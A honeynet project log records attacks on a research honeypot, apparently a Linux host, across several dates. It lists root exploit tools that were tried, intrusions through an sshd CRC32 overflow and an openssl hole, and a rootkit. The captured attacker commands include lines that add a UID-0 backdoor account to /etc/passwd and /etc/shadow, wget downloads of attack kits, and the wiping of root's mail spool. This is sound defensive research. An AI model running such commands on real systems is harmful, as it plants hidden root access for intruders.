HoneyNet Project


Some Findings

September 7

Guest account login via telnet.  After login, try ftp tools from his/her site but failed (as the the honeynet firewall had cut all outgoing traffic at that time). From ttysnoop log, we find that the hacker then try to build his/her local root exploit tools by cat command.

bash-2.04$ cat >> imp-finger.c /* - Imperfection Security Presents - Debian GNU/Linux cfingerd remote root exploit From shakey, of Imperfection Security [07/99] Exploits a problem reported on BUGTRAQ in Debian's ...

The following local exploit tools had been tried at the honeypot host:

imp-finger
ptrace24,
suk,
wuftp,
lpd,
localroot  netkit-0.17-7 local root exploit,
linuxconf,
7350wurm,
bashack,
sambaroot1

September 16

Got the hacker ftp site file list. The hacker had tried the hacking tools of bashack, linuxcon, sambaroot, wu-imap ... etc

September 19

Someone from Canada and Romania get into the root shell via sshd CRC32 overflow vulnerability.

A root shell connection was established at port 12345 after the sshd overflow. Here is the trace of the hacker activities in this root shell connection.

w;.. echo "muie:x:0:501::/home/muie:/bin/bash">>/etc/passwd;.. echo "muie:$1$U4BxCX2h$pJFV/Gp7aKbJ4h.Ygd5eZ0:11948:0:99999:7::: ">>;/etc/shadow;.. cat /etc/passwd;.. echo newoneop | passwd &> /dev/null --stdin games;.. /usr/sbin/usermod &>; /dev/null -u 0 -o games;..

Hence two backdoor accounts (muie and game) were set as shown in the /etc/passwd and /etc/shadow file

in /etc/passwd muie:x:0:501::/home/muie:/bin/bash in /etc/shadow muie:$1$9oYCFsWF$3Nu4NL7OxOMNBJkw1IeWi0:11948:0:99999:7:::

The hacker accessed the honeypot by these backdoor accounts.

The last log shows: muie pts/0 xx.xx.72.168 Thu Sep 19 05:06 - 05:46 (00:39) muie pts/1 xx.xx.72.180 Thu Sep 19 03:45 - 03:50 (00:04) games pts/0 xx.xx.72.180 Thu Sep 19 03:36 - 04:25 (00:49)

From the ~games/.bash_history file

id ftp xxx.xx.ro ftp xxx.xxx.236.42 ls wget www.xxx.xxx.xxx.ro/kit.tgz netstat cat /etc/passwd passwd muie id ftp users.xxx.ro ftp xxx.xxx.236.41 rm -rf /var/spool/mail/root touch /var/spool/mail/root

Here is the kit.tgz list.

Another sshd hacking via sshd CRC32 overflow on that day. The activities carried out by this hacker is:

The previous hacker came back and try to download the psy.tgz. Here is the trace.

September 26

Hacker from Argentina hacked in through sshd CRC32 overflow vulnerability. Now the root shell connection port is 3879 not 12345. The backdoor account still use muie but with different password

Now the /etc/passwd has two backdoor accounts muie muie:x:0:501::/home/muie:/bin/bash muie:x:0:501::/home/muie:/bin/bash but with different password in /etc/shadow muie:$1$9oYCFsWF$3Nu4NL7OxOMNBJkw1IeWi0:11948:0:99999:7::: muie:$1$U4BxCX2h$pJFV/Gp7aKbJ4h.Ygd5eZ0:11948:0:99999:7:::

Hacker from Mexico try to hack in through sshd CRC32 overflow but not success as the honeynet firewall had cut the traffic

October 26

Hacker from Seattle hacked into the honeypot by openssl vulnerability and successfully install rootkit. Here is the trace.

Here is the list of the test packets [root@pc11 ...]# ls -Fa ./ ../ bang* test/ [root@pc11 ...]# ls -Fa test ./ adore-0.42/ crontab-entry find* in.telnetd* install.log lsof* muie.tgz pstree* sshd/ syslogd* vadim* ./ chsh* du* functions* inet* killall* md5bd* netstat* sense* stealth* syslogd.init* xinetd* adore-0.34/ clean* filez/ ifconfig* install* ls* md5sum* ps* slice* sysinfo* top* Here is the install file.

Here is the honeypot kernel files in /boot

root@pc11 /boot]# ls -ltr total 5068 -rw-r--r-- 1 root root 662413 Aug 23 2000 vmlinuz-2.2.16-22enterprise -rwxr-xr-x 1 root root 1756599 Aug 23 2000 vmlinux-2.2.16-22enterprise -rw-r--r-- 1 root root 213782 Aug 23 2000 System.map-2.2.16-22enterprise -rw-r--r-- 1 root root 627392 Aug 23 2000 vmlinuz-2.2.16-22 -rwxr-xr-x 1 root root 1621492 Aug 23 2000 vmlinux-2.2.16-22 -rw-r--r-- 1 root root 11773 Aug 23 2000 module-info-2.2.16-22 -rw-r--r-- 1 root root 200285 Aug 23 2000 System.map-2.2.16-22 -rw-r--r-- 1 root root 640 Aug 23 2000 os2_d.b -rw-r--r-- 1 root root 23108 Aug 23 2000 message -rw-r--r-- 1 root root 612 Aug 23 2000 chain.b -rw-r--r-- 1 root root 5824 Aug 23 2000 boot.b -rw-r--r-- 1 root root 0 Aug 25 2000 kernel.h-2.4.0 -rw-r--r-- 1 root root 405 Jun 6 16:29 kernel.h-2.2.16 lrwxrwxrwx 1 root root 27 Jun 6 23:10 vmlinuz -> vmlinuz-2.2.16-22enterprise lrwxrwxrwx 1 root root 31 Jun 6 23:10 module-info -> module-info-2.2.16-22enterprise lrwxrwxrwx 1 root root 15 Jun 6 23:12 kernel.h -> kernel.h-2.2.16 -rw------- 1 root root 10752 Jun 7 00:24 map -rw-r--r-- 1 root root 512 Jun 7 00:24 boot.0300 lrwxrwxrwx 1 root root 20 Oct 30 11:32 System.map -> System.map-2.2.16-22

Adventure still continue ...